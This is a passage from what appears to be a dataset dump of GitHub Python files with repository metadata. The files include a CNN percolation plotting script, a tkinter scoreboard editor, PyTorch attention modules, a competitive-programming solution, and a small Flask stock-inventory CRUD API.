repr1)\n\n else:\n\n return \"(%s %s) x 10^%s\" % (num, repr1, expon)\n\n\ndef _sign(number):\n\n if number < 0:\n\n return \"-\"\n\n else:\n\n return \"+\"\n","repo_name":"threeML/threeML","sub_path":"threeML/io/uncertainty_formatter.py","file_name":"uncertainty_formatter.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"2"} +{"seq_id":"19414421795","text":"\nimport os\nos.environ[\"TF_CPP_spill_LOG_LEVEL\"]=\"3\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" # gpu if \"0\"; cpu if \"-1\"\nimport numpy as np\nimport tensorflow as tf\ngpus = tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_virtual_device_configuration(gpus[0],\n [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=4608),\n tf.config.experimental.VirtualDeviceConfiguration(memory_limit=4608)])\ntf.keras.backend.clear_session()\nimport time\nimport random\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA, IncrementalPCA, KernelPCA\nfrom sklearn.manifold import TSNE\nfrom sklearn.cluster import KMeans\n\nfrom utils import read_data\n\nstart_time = time.time()\nseed = 12345\nrandom.seed(seed)\nnp.random.seed(seed=seed)\n\nsweeps = 10**3\nimage_height = 28\nimage_size = 28*28\nepochs = 10**3\nlearning_rate = 1e-4\nbatch_size = 256\nl2_rate = 1e-4\n\nnum_classes = 1\nl2_rate = 0\nfilter1 = 32\nfilter2 = 64\nfc1 = 128\ndropout_rate = 0.5\n\nper = np.linspace(0.41, 0.80, 40).reshape(-1,) # 0.593\nfile_location = os.getcwd()\nx = read_data(file_location=file_location + r\"\\data\", \n name=\"x_1000\")\npi1 = pi = read_data(file_location=file_location+r\"\\data\", name=\"Pi_1000\")\np1 = p = read_data(file_location=file_location+r\"\\data\", name=\"P_1000\")\n\npi_m = np.array(np.tile(pi, sweeps))\na = np.argwhere((pi_m<=0.1) & (pi_m>=0.9))\nb = np.argwhere((pi_m>0.1) & (pi_m<0.9))\n\n# pi = pi[a].reshape(-1, 1)\n# p = p[a].reshape(-1, 1)\npi = np.append(pi[np.argwhere(pi<=0.1)], pi[np.argwhere(pi>=0.9)],axis=0)\np = np.append(p[np.argwhere(pi<=0.1)], p[np.argwhere(pi>=0.9)],axis=0)\n# per = np.concatenate((per[np.argwhere(pi<=0.1)], per[np.argwhere(pi>=0.9)]),axis=0)\nper = list(np.arange(0.41, 0.54, 0.01)) + list(np.arange(0.65, 0.80, 0.01))\nper_test = list(np.arange(0.55, 0.65, 0.01))\n\n# x1 = x[a].reshape(-1, image_height, image_height, 1)\nx_test = x[b].reshape(-1, image_height, image_height, 1)\n\nmodel_pi = tf.keras.models.load_model(file_location +\n r\"\\model_cnn_pi\" +\n r\"\\inference\" +\n r\"\\00956-0.000071-0.005427-0.008450-0.000504-0.009347-0.022452.h5\")\nmodel_p = tf.keras.models.load_model(file_location +\n r\"\\model_cnn_p\" +\n r\"\\inference\" +\n r\"\\00814-0.000030-0.003213-0.005510-0.000164-0.006277-0.012796.h5\")\n\n\nfig = plt.figure(figsize=(5,4)) \nax = fig.add_subplot(111) \nplt.plot(np.linspace(0.41, 0.80, 40), pi1, c='grey', \n marker=\"*\", label=\"MC\", linewidth=2)\nplt.scatter(per, pi, c='dodgerblue', marker=\"s\", \n label=\"truncated\", linewidth=2)\ny_pred = model_pi.predict(x_test)\ny_pred_average = [y_pred[i::10] for i in np.arange(10)]\ny_pred_average = np.array(y_pred_average).reshape(-1, 1000)\ny_pred_average = np.mean(y_pred_average, axis=1)\nplt.scatter(per_test, y_pred_average, c='indianred', \n label=\"extrapolated\", marker=\"o\", linewidth=2)\n# ax.text(0.41, 0.93, '(a)', fontsize=14)\nplt.xlabel('$p$', fontsize=14)\nplt.ylabel('$\\Pi(p,L)$', fontsize=14)\nplt.xticks(size=12)\nplt.yticks(size=12)\nplt.xlim(0.39, 0.81)\nplt.ylim(-0.09, 1.09)\nplt.legend(loc=\"lower right\")\nax = plt.gca()\nax.spines['bottom'].set_linewidth(1.5)\nax.spines['left'].set_linewidth(1.5)\nax.spines['top'].set_linewidth(1.5)\nax.spines['right'].set_linewidth(1.5)\nfrom pylab import *\ntick_params(which='major', width=2)\nax.xaxis.set_major_locator(plt.MultipleLocator(0.1))\nax.yaxis.set_major_locator(plt.MultipleLocator(0.2))\nax.xaxis.set_minor_locator(plt.MultipleLocator(0.01))\nplt.subplots_adjust(left=None,bottom=None,\n right=None,top=None,wspace=0.5,hspace=None)\nplt.tight_layout()\n\n# ax = fig.add_subplot(122) \n# plt.plot(np.linspace(0.41, 0.80, 40), p1, c='grey', marker=\"*\", label=\"raw\", linewidth=2)\n# # plt.scatter(per, p, c='dodgerblue', marker=\"s\", label=\" truncated dataset\", linewidth=2)\n# y_pred = model_p.predict(x_test)\n# y_pred_average = [y_pred[i::10] for i in np.arange(10)]\n# y_pred_average = np.array(y_pred_average).reshape(-1, 1000)\n# y_pred_average = np.mean(y_pred_average, axis=1)\n# plt.scatter(per_test, y_pred_average, c='indianred', \n# label=\" removed dataset\", marker=\"o\", linewidth=2)\n# ax.text(0.41, 0.93, '(a)', fontsize=14)\n# plt.xlabel('permeability', fontsize=14)\n# plt.ylabel('$P(p,L)$', fontsize=14)\n# plt.xticks(size=12)\n# plt.yticks(size=12)\n# plt.xlim(0.39, 0.81)\n# plt.ylim(-0.09, 1.09)\n# plt.grid(True, linestyle='--', linewidth=1.5)\n# plt.legend(loc=\"lower right\")\n# ax = plt.gca()\n# ax.spines['bottom'].set_linewidth(1.5)\n# ax.spines['left'].set_linewidth(1.5)\n# ax.spines['top'].set_linewidth(1.5)\n# ax.spines['right'].set_linewidth(1.5)\n\nplt.savefig(r\".\\figure\\cnn-percolation-pi-inference.pdf\")\nplt.savefig(r\".\\figure\\cnn-percolation-pi-inference.eps\")\nplt.show()\n","repo_name":"Chen-Sue/Percolation_Model_ML","sub_path":"plot-cnn-percolation-pi-p-inference.py","file_name":"plot-cnn-percolation-pi-p-inference.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36100195894","text":"from tkinter import *\nimport tkinter\nimport io\nimport xml.etree.cElementTree as ET\nimport datetime\n\ntop = tkinter.Tk() # class in tkinter that is being saved as variable\n\ntop.resizable(width=\"False\", height=\"False\")\n\ndef extractCharNames():\n file = open(\"characters.txt\", \"r\")\n characternames = (file.read()).split(\"\\n\")\n characternames.sort()\n return characternames\n\n\ndef getTime():\n currenttime = datetime.datetime\n time = currenttime.now()\n print(time)\n return str(time)\n\n\ndef outputXML():\n name1 = Entry.get(p1Name)\n char1 = p1.get()\n num1 = score1.get()\n name2 = Entry.get(p2Name)\n char2 = p2.get()\n num2 = score2.get()\n team1 = color1.get()\n name3 = Entry.get(p3Name)\n char3 = p3.get()\n name4 = Entry.get(p4Name)\n char4 = p4.get()\n team2 = color2.get()\n tw1 = Entry.get(twitter1Name)\n tw2 = Entry.get(twitter2Name)\n loc = Entry.get(location)\n dt = Entry.get(date)\n comm1 = Entry.get(comm1Name)\n comm2 = Entry.get(comm2Name)\n bLink = Entry.get(bracketLink)\n brackLoc = Entry.get(bracketLocation)\n\n root = ET.Element(\"scoreboard\")\n players = ET.SubElement(root, \"players\")\n # elements below players\n ET.SubElement(players, \"player1\").text = name1\n ET.SubElement(players, \"character1\").text = char1\n ET.SubElement(players, \"score1\").text = num1\n ET.SubElement(players, \"player2\").text = name2\n ET.SubElement(players, \"score2\").text = num2\n ET.SubElement(players, \"character2\").text = char2\n ET.SubElement(players, \"team-color1\").text = team1\n ET.SubElement(players, \"player3\").text = name3\n ET.SubElement(players, \"character3\").text = char3\n ET.SubElement(players, \"player4\").text = name4\n ET.SubElement(players, \"character4\").text = char4\n ET.SubElement(players, \"team-color2\").text = team2\n\n # elements below game status\n status = ET.SubElement(root, \"game-status\")\n ET.SubElement(status, \"bracket-location\").text = brackLoc\n ET.SubElement(status, \"bracket-link\").text = bLink\n ET.SubElement(status, \"date\").text = dt\n ET.SubElement(status, \"location\").text = loc\n\n # elements for commentary\n comm = ET.SubElement(root, \"commentary\")\n ET.SubElement(comm, \"commentator1\").text = comm1\n ET.SubElement(comm, \"commentator2\").text = comm2\n ET.SubElement(comm, \"twitter1\").text = tw1\n ET.SubElement(comm, \"twitter2\").text = tw2\n\n ET.SubElement(root, \"timestamp\").text = getTime()\n\n tree = ET.ElementTree(root)\n tree.write(\"../overlay/scoreboard.xml\")\n\n\ndef swap():\n name1 = Entry.get(p1Name)\n name2 = Entry.get(p2Name)\n name3 = Entry.get(p3Name)\n name4 = Entry.get(p4Name)\n char1 = p1.get()\n char2 = p2.get()\n char3 = p3.get()\n char4 = p4.get()\n p1Name.delete(0, END)\n p1Name.insert(0, name2)\n p2Name.delete(0, END)\n p2Name.insert(0, name1)\n p3Name.delete(0, END)\n p3Name.insert(0, name4)\n p4Name.delete(0, END)\n p4Name.insert(0, name3)\n p1.set(char2)\n p2.set(char1)\n p3.set(char4)\n p4.set(char3)\n\n\nlistOfChars = extractCharNames()\n\n\ntop.title(\"Stream Editor\")\ncolor1 = StringVar(top)\ncolor2 = StringVar(top)\np1 = StringVar(top)\np2 = StringVar(top)\np3 = StringVar(top)\np4 = StringVar(top)\nscore1 = StringVar(top)\nscore2 = StringVar(top)\nteamColors = {\"blue\", \"red\", \"green\"}\nscores = [\"0\", \"1\", \"2\", \"3\"]\n\nplayers = Label(top, text=\"Players\").grid(row=0,column=0)\nteam1Text = Label(top, text=\"Team 1\").grid(row=1, column=0)\np1Title = Label(top, text=\"Player 1\").grid(row=1, column=1)\np1Name = Entry(top, bd=5)\np1Name.grid(row=1, column=2)\np1Char = OptionMenu(top, p1, *listOfChars).grid(row=1, column=3)\np1Score = OptionMenu(top, score1, *scores).grid(row=1, column=4)\nteam2Text = Label(top, text=\"Team 2\").grid(row=1, column=5)\np2Title = Label(top, text=\"Player 2\").grid(row=1, column=6)\np2Name = Entry(top, bd=5)\np2Name.grid(row=1, column=7)\np2Char = OptionMenu(top, p2, *listOfChars).grid(row=1, column=8)\np2Score = OptionMenu(top, score2, *scores).grid(row=1, column=9)\n# team color picker\nt1Color = OptionMenu(top, color1, *teamColors)\nt1Color.grid(row=2, column=0)\np3Title = Label(top, text=\"Player 3\").grid(row=2, column=1)\np3Name = Entry(top, bd=5)\np3Name.grid(row=2, column=2)\np3Char = OptionMenu(top, p3, *listOfChars).grid(row=2, column=3)\nt2Color = OptionMenu(top, color2, *teamColors).grid(row=2, column=4)\np4Title = Label(top, text=\"Player 4\").grid(row=2, column=5)\np4Name = Entry(top, bd=5)\np4Name.grid(row=2, column=6)\np4Char = OptionMenu(top, p4, *listOfChars).grid(row=2, column=7)\n# game status\ngameStatus = Label(top, text=\"Game Status\").grid(row=3, column=0)\nbracketLocText = Label(top, text=\"Bracket Location\").grid(row=4, column=0)\nbracketLocation = Entry(top, bd=5)\nbracketLocation.grid(row=4, column=1)\nbracketLinkText = Label(top, text=\"Bracket Link\").grid(row=4, column=2)\nbracketLink = Entry(top, bd=5)\nbracketLink.grid(row=4, column=3)\ndateText = Label(top, text=\"Date\").grid(row=4, column=4)\ndate = Entry(top, bd=5)\ndate.grid(row=4, column=5)\nlocationText = Label(top, text=\"Location\").grid(row=4, column=6)\nlocation = Entry(top, bd=5)\nlocation.grid(row=4, column=7)\n# commentary\ncommentaryText = Label(top, text=\"Commentary\").grid(row=5, column=0)\ncomm1Text = Label(top, text=\"Commentator 1\").grid(row=6, column=0)\ncomm1Name = Entry(top, bd=5)\ncomm1Name.grid(row=6, column=1)\ncomm2Text = Label(top, text=\"Commentator 2\").grid(row=6, column=2)\ncomm2Name = Entry(top, bd=5)\ncomm2Name.grid(row=6, column=3)\ntwitter1Text = Label(top, text=\"Twitter1\").grid(row=7, column=0)\ntwitter1Name = Entry(top, bd=5)\ntwitter1Name.grid(row=7, column=1)\ntwitter2Text = Label(top, text=\"Twitter 2\").grid(row=7, column=2)\ntwitter2Name = Entry(top, bd=5)\ntwitter2Name.grid(row=7, column=3)\n\n# swap command that changes player 1 and 2 names and characters\nswap = Button(top, text=\"Swap\", command=swap).grid(row=7, column=6)\n# saves the text in the boxes to an XML file\nsave = Button(top, text=\"Save!\", command=outputXML).grid(row=7, column=7)\n\ntop.mainloop()\n","repo_name":"joncady/scoreboard_and_overlays","sub_path":"scoreboard/scoreboard_editor.py","file_name":"scoreboard_editor.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"24291154901","text":"import torch\nimport torch.nn as nn\nfrom einops import rearrange\n# class CC(nn.Module):\n# \"\"\"Constructs a C_C module.\n# Args:\n# channel: Number of channels of the input feature map\n# \"\"\"\n# def __init__(self, kernel):\n# super(CC, self).__init__()\n# self.avg_pool = nn.AdaptiveAvgPool2d(1)\n# self.conv = nn.Conv1d(1, 1, kernel_size=kernel, padding=int((kernel-1)//2), bias=False)\n# self.sigmoid = nn.Sigmoid()\n#\n# def forward(self, x):\n#\n# # feature descriptor on the global spatial information\n# y = self.avg_pool(x)\n# # Two different branches of CC module\n# t=rearrange(rearrange(y,'b c w h->b c (w h)'),'b c w->b w c')\n# y = self.conv(t)\n# y=rearrange(rearrange(y,'b c w->b w c'),'b c (w h)->b c w h',w=1,h=1)\n# # Multi-scale information fusion\n# y = self.sigmoid(y)\n#\n# return x * y.expand_as(x)\nclass CC(nn.Module):\n def __init__(self, channel,k_size):\n super(CC, self).__init__()\n self.k_size=k_size\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.conv = nn.Conv1d(channel, channel, kernel_size=k_size, bias=False, groups=channel)\n self.sigmoid = nn.Sigmoid()\n\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x)\n y = nn.functional.unfold(y.transpose(-1, -3), kernel_size=(1, self.k_size), padding=(0, (self.k_size - 1) // 2))\n y = self.conv(y.transpose(-1, -2)).unsqueeze(-1)\n y = self.sigmoid(y)\n x = x * y.expand_as(x)\n return x\nclass BasicConv(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1, groups=1, relu=True, bn=True, bias=False):\n super(BasicConv, self).__init__()\n self.out_channels = out_planes\n self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias)\n self.bn = nn.BatchNorm2d(out_planes,eps=1e-5, momentum=0.01, affine=True) if bn else None\n self.relu = nn.ReLU() if relu else None\n\n def forward(self, x):\n x = self.conv(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.relu is not None:\n x = self.relu(x)\n return x\nclass ZPool(nn.Module):\n def forward(self, x):\n return torch.cat( (torch.max(x,1)[0].unsqueeze(1), torch.mean(x,1).unsqueeze(1)), dim=1 )\n\nclass AttentionGate(nn.Module):\n def __init__(self):\n super(AttentionGate, self).__init__()\n kernel_size = 3\n self.compress = ZPool()\n self.conv = BasicConv(2, 1, kernel_size, stride=1, padding=(kernel_size-1) // 2, relu=False)\n def forward(self, x):\n x_compress = self.compress(x)\n x_out = self.conv(x_compress)\n scale = torch.sigmoid_(x_out)\n return x * scale\nclass TripletAttention(nn.Module):\n def __init__(self, no_spatial=False):\n super(TripletAttention, self).__init__()\n self.cw = AttentionGate()\n self.hc = AttentionGate()\n self.no_spatial=no_spatial\n if not no_spatial:\n self.hw = AttentionGate()\n def forward(self, x):\n x_perm1 = x.permute(0,2,1,3).contiguous()\n x_out1 = self.cw(x_perm1)\n x_out11 = x_out1.permute(0,2,1,3).contiguous()\n x_perm2 = x.permute(0,3,2,1).contiguous()\n x_out2 = self.hc(x_perm2)\n x_out21 = x_out2.permute(0,3,2,1).contiguous()\n if not self.no_spatial:\n x_out = self.hw(x)\n x_out = 1/3 * (x_out + x_out11 + x_out21)\n else:\n x_out = 1/2 * (x_out11 + x_out21)\n return x_out\nclass CCWH(nn.Module):\n def __init__(self, channels):\n super(CCWH, self).__init__()\n self.C_H = AttentionGate()\n self.C_W = AttentionGate()\n self.C_C=CC(channels,3)\n def forward(self, x):\n x_perm1 = x.permute(0, 2, 1, 3).contiguous()\n x_out1 = self.C_W(x_perm1)\n x_out11 = x_out1.permute(0, 2, 1, 3).contiguous()\n x_perm2 = x.permute(0, 3, 2, 1).contiguous()\n x_out2 = self.C_H(x_perm2)\n x_out21 = x_out2.permute(0, 3, 2, 1).contiguous()\n\n x_out = self.C_C(x)\n #print(x_out11.shape,x_out.shape)\n x_out = (1/2)*(x_out11 + x_out21)+x_out\n return x_out\n# model = CCWH(160)\n# import time\n# input = torch.randn(4, 160, 32,32)\n# start=time.time()\n# out = model(input)\n# print(time.time()-start)\n# print(out.shape)","repo_name":"Willamjie/CCWH-ACB","sub_path":"models/CCWH_0.py","file_name":"CCWH_0.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"4775436420","text":"import io\nimport sys\n_INPUT = \"\"\"\\\n6\n1 5 7 10 15 19\n6\n0\n2\n6\n12\n18\n25\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n#--------------------------------------#\n\nN = int(input())\nA = list(map(int, input().split())) + [-10**18] + [10**18]\nA.sort()\nQ = int(input())\n\ndef bisearch(rate):\n l, r = 0, N+1\n while l+1 < r:\n mid = (l + r) // 2\n if rate == A[mid]:\n return mid\n elif rate < A[mid]:\n r = mid\n else:\n l = mid\n return l\n\nfor _ in range(Q):\n Bi = int(input())\n class_left = bisearch(Bi)\n print(min(Bi - A[class_left], A[class_left+1] - Bi))\n\n\n","repo_name":"yudaiOfRiver/atcoder","sub_path":"tenkei/007.py","file_name":"007.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1742509657","text":"import streamlit as st\nimport pandas as pd\n\ndef main():\n \"\"\"\n This function shows the raw dataset behind the dashboard\n :return: Table with data\n \"\"\"\n # set title\n st.title(\"Data\")\n st.write(\"Data retrieved from: https://www.kaggle.com/code/lennarthaupts/airbnb-prices-in-berlin/data\")\n # dataframe\n data = pd.read_csv(\"listings_berlin.csv\")\n\n # give the user the opportunity to have a look at the data\n if st.checkbox(\"Show data...\"):\n st.subheader(\"Raw data\")\n # show data\n st.write(data)\n st.subheader(\"Locations of Airbnb's\")\n st.map(data)","repo_name":"MilenaLang/streamlit_dashboard","sub_path":"app/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74533844205","text":"from time import sleep\nfrom enum import IntEnum\n\n# Importing from local source\nfrom communication.subscriber import Subscriber\nfrom communication.server import Server\n\n\n \n\n# Subscribers\nIP = 'localhost'\nTRACKING_PORT = 5556\nDEPTH_PORT = 5558\nSERIAL_PORT = 5560\n\n# Server\nHOST = '0.0.0.0'\nPORT = 8089\n\n# Tracking camera\ntracking_camera_sub = Subscriber(ip=IP, port=TRACKING_PORT, topic='pose')\ntracking_camera_sub.initialize()\n\n# Depth camera\ndepth_camera_sub = Subscriber(ip=IP, port=DEPTH_PORT, topic='img')\ndepth_camera_sub.initialize()\n\n# Serial connection\n#serial_sub = Subscriber(ip=IP, port=SERIAL_PORT, topic='serial')\n#serial_sub.initialize()\n\n# Internal server\nserver = Server(host=HOST, port=PORT)\nserver.initialize()\n\n\nif __name__ == \"__main__\":\n while True:\n if not server.isConnected():\n server.listening()\n while server.isConnected():\n try:\n tracking_camera_sub.read()\n #server.send(tracking_camera_sub.msg)\n #serial_sub.read()\n #server.send(serial_sub.msg)\n depth_camera_sub.read()\n server.send(\"HELLO\")\n except Exception:\n server.disconnect()\n ","repo_name":"magnusoy/Sparkie","sub_path":"python/src/deprecated/gui_server.py","file_name":"gui_server.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"2"} +{"seq_id":"14350235775","text":"from app.core import init_app, connect_db\nimport logging\nimport sys\n\napp = init_app()\nif __name__ == '__main__':\n try:\n app.run(debug=app.config['DEBUG'], host=app.config['HOST'], port=int(app.config['PORT']))\n except Exception:\n logging.error(\"Cannot start Flask app: {} {}\".format(\n sys._getframe().f_code.co_name,\n str(sys.exc_info())\n ))\n","repo_name":"chuonglh/todo","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25167990171","text":"# 1. 간단한 N의 약수\nN = int(input())\nN_list = []\nfor i in range(1,N+1):\n if N % i == 0:\n N_list.append(i)\nprint(N_list)\n\n# 2. List의 합 구하기\ndef list_sum(num):\n result = 0\n for i in num:\n result += i\n return result\nprint(list_sum([1,2,3,4,5]))\n\n# 3. Dictionary로 이루어진 List의 합 구하기\ndef dict_list_sum(x):\n ages = 0\n for i in range(len(x)):\n ages += x[i]['age']\n return ages\nage_list = [{'name' : 'kim', 'age' : 12}, {'name' : 'Lee', 'age' : 4}] \nprint(dict_list_sum(age_list))\n\n# 4. 2차원 List의 전체 합 구하기\ndef all_list_sum(x):\n result = 0\n for i in range(len(x)):\n for j in range(len(x[i])):\n result += x[i][j]\n return result\n\nall_list = [[1], [2,3], [4,5,6], [7,8,9,10]]\nprint(all_list_sum(all_list))\n\n# 5. 숫자의 의미\ndef get_secret_word(x):\n word = ' '\n for i in range(len(x)):\n word += chr(x[i])\n return word\nget_word = [83, 115, 65, 102, 89]\nprint(get_secret_word(get_word))\n\n# 6. 내 이름은 몇 일까?\ndef get_secret_number(x):\n number = 0\n for i in x:\n number += ord(i)\n return number\nget_number = 'happy'\nprint(get_secret_number(get_number))\n\n# 7. 강한 이름\ndef get_strong_word(x,y):\n if get_secret_number(x) > get_secret_number(y):\n return x\n else:\n return y\nprint(get_strong_word('delilah','dixon'))\n\n\n","repo_name":"ShinJongHyuk/hws","sub_path":"01_python/04_advanced_function_and_env/04_python_practice.py","file_name":"04_python_practice.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13171402368","text":"import os, sys\nnowpath = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(nowpath)\nsys.path.append(os.path.join(nowpath, '..'))\nfrom data_choy import DataLoader_Choy\nfrom core.mystruct import Camera, View, FnameGroup, RenderParam\nfrom core.dataset.ShapeNetV2 import ShapeNetV2\nfrom core.randomize.randomizer import Randomizer\nfrom core.tools.render import Renderer\nimport numpy as np\nfrom tqdm import tqdm\nimport pdb\n\nclass ChoyRenderer(object):\n def __init__(self, shapenet_dir, choy_dir, output_dir, resolution=(137, 137)):\n self.data_shapenet = ShapeNetV2(shapenet_dir)\n self.data_choy = DataLoader_Choy(choy_dir)\n self.output_dir = output_dir\n if not os.path.exists(self.output_dir):\n os.makedirs(self.output_dir)\n randomizer_config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'core', 'randomize', 'choy_renderer.yaml')\n self.randomizer = Randomizer(config_file=randomizer_config_file)\n self.resolution = resolution\n\n self.transform_matrix_deepsdf = np.array([[1., 0., 0.], [0., 0., -1.], [0., 1., 0.]])\n self.transform_matrix_choy = np.array([[0., 0., -1.], [0., 1., 0.], [1., 0., 0.]])\n self.transform_matrix = np.dot(self.transform_matrix_choy, self.transform_matrix_deepsdf.T)\n\n def transform_camera(self, camera):\n K, RT = camera.intrinsic, camera.extrinsic\n R, T = RT[:,:3], RT[:,[3]]\n R_new = np.dot(R, self.transform_matrix)\n RT_new = np.concatenate([R_new, T], 1)\n camera_new = Camera(K, RT_new)\n return camera_new\n\n def generate_render_param_list(self):\n render_param_list = []\n for i, data in enumerate(self.data_choy):\n basedir = data['basedir']\n class_id = data['class_id']\n instance_name = data['instance_name']\n camera_list = data['camera_list']\n view_list = data['view_list']\n render_param = self.generate_render_param_from_camera(basedir, class_id, instance_name, camera_list)\n # render_param = self.generate_render_param_from_view(basedir, class_id, instance_name, camera_list)\n render_param_list.append(render_param)\n return render_param_list\n\n def generate_render_param_from_camera(self, basedir, class_id, instance_name, camera_list):\n shape = self.data_shapenet.get_shape_from_instance_name(class_id, instance_name)\n view_list, lighting_list, target_cfg_list = [], [], []\n for idx, camera in enumerate(camera_list):\n # set view\n view = View()\n camera = self.transform_camera(camera)\n view.set_camera(camera)\n # set lighting\n lighting = self.randomizer.randomize_lighting(use_point_lighting=False)\n # set target filename\n # basedir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test')\n basedir = os.path.join(self.output_dir, class_id, instance_name)\n if not os.path.exists(basedir):\n os.makedirs(basedir)\n target_cfg = FnameGroup(os.path.join(basedir, '{0}_{1}_{2}.png'.format(class_id, instance_name, idx)))\n # append to list\n view_list.append(view)\n lighting_list.append(lighting)\n target_cfg_list.append(target_cfg)\n render_param = RenderParam(shape, view_list, lighting_list, target_cfg_list, resolution=self.resolution) \n return render_param\n\n def generate_render_param_from_view(self, basedir, class_id, instance_name, view_list):\n shape = self.data_shapenet.get_shape_from_instance_name(class_id, instance_name)\n view_list, lighting_list, target_cfg_list = [], [], []\n for idx, view in enumerate(view_list):\n lighting = self.randomizer.randomize_lighting()\n basedir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test')\n target_cfg = FnameGroup(os.path.join(basedir, '{0}_{1}_{2}.png'.format(class_id, instance_name, idx)))\n view_list.append(view)\n lighting_list.append(lighting)\n target_cfg_list.append(target_cfg)\n render_param = RenderParam(shape, view_list, lighting_list, target_cfg_list, resolution=self.resolution) \n return render_param\n\nif __name__ == '__main__':\n nowpath = os.path.dirname(os.path.abspath(__file__))\n shapenet_dir = os.path.join(nowpath, '../data/ShapeNetCore.v2')\n choy_dir = os.path.expanduser('~/data/ShapeNetRendering')\n blender_dir = os.path.join(nowpath, '../install/blender-2.71-linux-glibc211-x86_64/blender')\n output_dir = os.path.expanduser('~/data/ambient-choy-ShapeNetV2')\n\n choy_renderer = ChoyRenderer(shapenet_dir, choy_dir, output_dir)\n render_param_list = choy_renderer.generate_render_param_list()\n RP = Renderer(blender_dir, num_worker=8)\n RP.render_all(render_param_list, cam_lens=35, render_depth=True, render_normal=False, render_albedo=False)\n\n","repo_name":"B1ueber2y/DIST-Renderer","sub_path":"synthesis/preprocess_choy/render_choy.py","file_name":"render_choy.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"2"} +{"seq_id":"22106371875","text":"'''\n处理输入数据\n'''\n\nimport base64\n\ndef handle_input(data: dict):\n '''\n 处理输入数据,把base64编码的数据解码,并把一切驼峰式命名转化为下划线命名\n '''\n\n if 'data' in data:\n data['data'] = base64.b64decode(data['data'])\n\n out_data = {}\n for key in data:\n if '_' in key:\n continue\n new_key = ''\n for char in key:\n if char.isupper():\n new_key += '_' + char.lower()\n else:\n new_key += char\n out_data[new_key] = data[key]\n\n return out_data\n","repo_name":"Chlamydomonos/IOTHW1","sub_path":"backend/pySrc/utils/input_handler.py","file_name":"input_handler.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74645311085","text":"#Code adapated from https://github.com/andrewbeattycourseware/dataRepresenation2020\nfrom stockDAO import stockDao\nfrom flask import Flask, url_for, request, redirect, abort,jsonify\napp = Flask(__name__, static_url_path='', static_folder='staticpages')\n\n\n\n\n@app.route('/')\ndef index():\n return \"is this thing on?\"\n\n@app.route('/stock')\ndef getAll():\n return jsonify(stockDao.getAll())\n#curl http://127.0.0.1:5000/stock\n\n@app.route('/stock/') \ndef findById(id): \n return jsonify(stockDao.findById(id))\n#curl http://127.0.0.1:5000/stock/10\n\n\n#curl -X POST -d \"{\\\"description\\\":\\\"Apple Juice Box\\\", \\\"price\\\":1250, \\\"provenance\\\":\\\"The Apple Farm, Cahir\\\"}\" -H \"Content-Type:application/json\" http://127.0.0.1:5000/stock\n@app.route('/stock', methods=['POST'])\ndef create(): \n\n if not request.json: #abort the request if it is not in the correct json format\n abort(400)\n \n #if it is a good request do this, append the book with a new id and so on\n item = {\n #\"id\":request.json[\"id\"], omitted because the mysqldb is auto-incremented\n \"description\": request.json[\"description\"],\n \"price\": request.json[\"price\"],\n \"provenance\": request.json[\"provenance\"]\n }\n\n return jsonify(stockDao.create(item))\n \n\n\n\n#curl -X PUT -d \"{\\\"description\\\":\\\"new lad\\\", \\\"price\\\":567, \\\"provenance\\\":\\\"Cashel\\\"}\" -H \"Content-Type:application/json\" http://127.0.0.1:5000/stock/15\n@app.route('/stock/', methods=['PUT'])\ndef update(id):\n foundItem=stockDao.findById(id)\n print(foundItem)\n if foundItem == {}:#if ya find nothing with that id, code 404 shows up on the server, {} on the screen.\n return jsonify({}), 404\n currentItem = foundItem\n if 'description' in request.json:\n currentItem['description'] = request.json['description']\n if 'price' in request.json:\n currentItem['price'] = request.json['price']\n if 'provenance' in request.json:\n currentItem['provenance'] = request.json['provenance']\n stockDao.update(currentItem)\n return jsonify(currentItem)\n\n\n#λ curl -X DELETE http://127.0.0.1:5000/stock/17\n#{\n# \"done\": true\n#}\n\n@app.route('/stock/', methods=['DELETE'])\ndef delete(id):\n stockDao.delete(id)\n return jsonify({\"done\":True})\n\nif __name__ == \"__main__\":\n 